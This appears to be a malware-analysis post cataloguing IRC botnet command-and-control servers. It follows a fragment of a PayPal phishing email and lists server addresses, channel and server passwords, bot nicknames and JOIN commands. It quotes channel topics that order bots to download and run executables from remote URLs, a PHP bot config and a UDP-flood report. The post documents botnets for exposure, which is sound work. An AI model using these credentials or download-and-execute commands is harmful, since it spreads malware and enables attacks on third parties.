I got this email today in my spam folder:
Dear valued PayPal Customer, We’re constantly working to make PayPal safer, simpler and more convenient for our customers. This means that from time to time we have to verify and keep up to date your account. It has come to our attention that your PayPal account...

kca.hopto.org (IRC botnet hosted in Turkey, Balikesir, Turk Telekomunikasyon Anonim Sirketi)
Resolved : [kca.hopto.org] To [88.255.116.48]
Server: 88.255.116.48:1453
Nick: new[iRooT-XP-AUT]990453
Username: 9904
Server Pass: KCA
Joined Channel: #XXX with Password KCA
Channel Topic for Channel #XXX: “.dwl http://www.pso-k.org/yes.exe .lan .html”
Private Message to Channel #XXX: “^C04[HTML Infector]: ^C09Html Files Infected!”
Private Message to Channel #XXX: “[Download]: Executed Successfully”
Private Message to Channel #XXX: “^C04[LAN Spread]: ^C09Spreading...

Havoc.strangled.net (IRC bot hosted in United States, State College, Comcast Business Communications Llc)
Resolved : [Havoc.strangled.net] To [173.167.76.199]
Server: 173.167.76.199:6667
PASS KCA
channel: #s
sample here: !dl http://67.18.242.165/~corporac/med.exe
hosting infos: http://whois.domaintools.com/173.167.76.199

4.byinter.net (IRC botnet hosted in Turkey, Balikesir, Turk Telekomunikasyon Anonim Sirketi)
Resolved : [4.byinter.net] To [88.255.116.47]
Download URLs
http://72.32.8.40/iplocator.htm (www.geobytes.com)
http://108.167.179.252/xxx.exe (www.grupobysoft.com)
Outgoing connection to remote server: www.geobytes.com TCP port 80
C&C Server: 88.255.116.47:6667
Server Password:
Username: TURKiSH
Nickname: [N][DEU][XP][29218]
Channel: #s (Password: KCA) #X, #XX, #XXX and #KCA
Channeltopic: :!download http://www.grupobysoft.com/xxx.exe 1
hosting infos: http://whois.domaintools.com/88.255.116.47

uokm8.biz (Insomnia Bot hosted in Netherlands, Tilburg, nfinite Technologies Limited)
Found from Userbased
Resolved : [uokm8.biz] To [192.162.136.148]
server port channel
Clients: I have 78 clients and 0 servers
Local users: Current Local Users: 78 Max: 156
Global users: Current Global Users: 78 Max: 156
uokm8.biz:3281 #zyk#
hosting infos: http://whois.domaintools.com/192.162.136.148

xsi.hi5fotos.info (IRC botnet hosted in Netherlands, Haarlem, Fiberring B.v.)
Resolved : [xsi.hi5fotos.info] To [87.255.51.229]
Remote Host Port Number
xsi.hi5fotos.info 4042
NICK new[USA|XP|COMPUTERNAME]alzhcjt
USER fu "" "lol" :fu
JOIN #usakesh
hosting infos: http://whois.domaintools.com/87.255.51.229

space.legendteam.info (IRC botnet hosted in Russian Federation, Keyweb Ag)
Resolved : [space.legendteam.info] To [95.169.187.66]
Remote Host Port Number
space.legendteam.info 1234
NICK zax-CD1A-1A40
USER zaxbot "" "" :zaxbot
JOIN #zax
MODE #zax +l 3
hosting infos: http://whois.domaintools.com/95.169.187.66

d.theimagebook.com (IRC botnet hosted in China, Nanchang, Chinanet Jiangxi Province Network)
Resolved : [d.theimagebook.com] To [117.21.226.243]
Remote Host Port Number
d.theimagebook.com 7081
PASS eee
Nick ljkng ssrr hvorp "" "chc" :hvorp
possible channels:
PRIVMSG #dpi :Err0r..
Nick n{US|XPa}pgfvioh
Channel #ng pass ng00
channel #us
hosting infos: http://whois.domaintools.com/117.21.226.243

brutinhoesilkster.servegame.com (Linux bots hosted in United States, Dallas, Limestone Networks Inc.)
Resolved : [brutinhoesilkster.servegame.com] To [63.143.41.236]
var $config = array("server"=>"brutinhoesilkster.servegame.com", "port"=>"443", "pass"=>"", "prefix"=>"[BET][RLZ]", "maxrand"=>"4", "chan"=>"#betorlz", "chan2"=>"", "key"=>"", "modes"=>"+iB-x", "password"=>"betinho", "trigger"=>".", "hostauth"=>"*" //
Clients: I have 297 clients and 0 servers
Local users: Current local users: 297 Max: 607
Global users: Current global users: 297 Max: 607
Now talking in #betorlz
([[BET][RLZ]2706) [UdpFlood Finalizado!]: 1687 MB enviados...

esta4.info (ngr botnet hosted in United States, San Jose, Serveryou.com – Oow)
Resolved : [esta4.info] To [216.172.132.123]
Other domain names used by the same guy:
jer0002.in Resolved : [jer0002.in] To [216.172.132.123]
jer0003.in Resolved : [jer0003.in] To [216.172.132.123]
ratk01.com Resolved : [ratk01.com] To [216.172.132.123]
Remote Host Port Number
199.15.234.7 80
216.172.132.123 1887
PASS powned
NICK n{US|XPa}rqrrlpw
USER rqrrlpw 0 0 :rqrrlpw
JOIN #sbsb powned
JOIN #XP
JOIN #US
Now...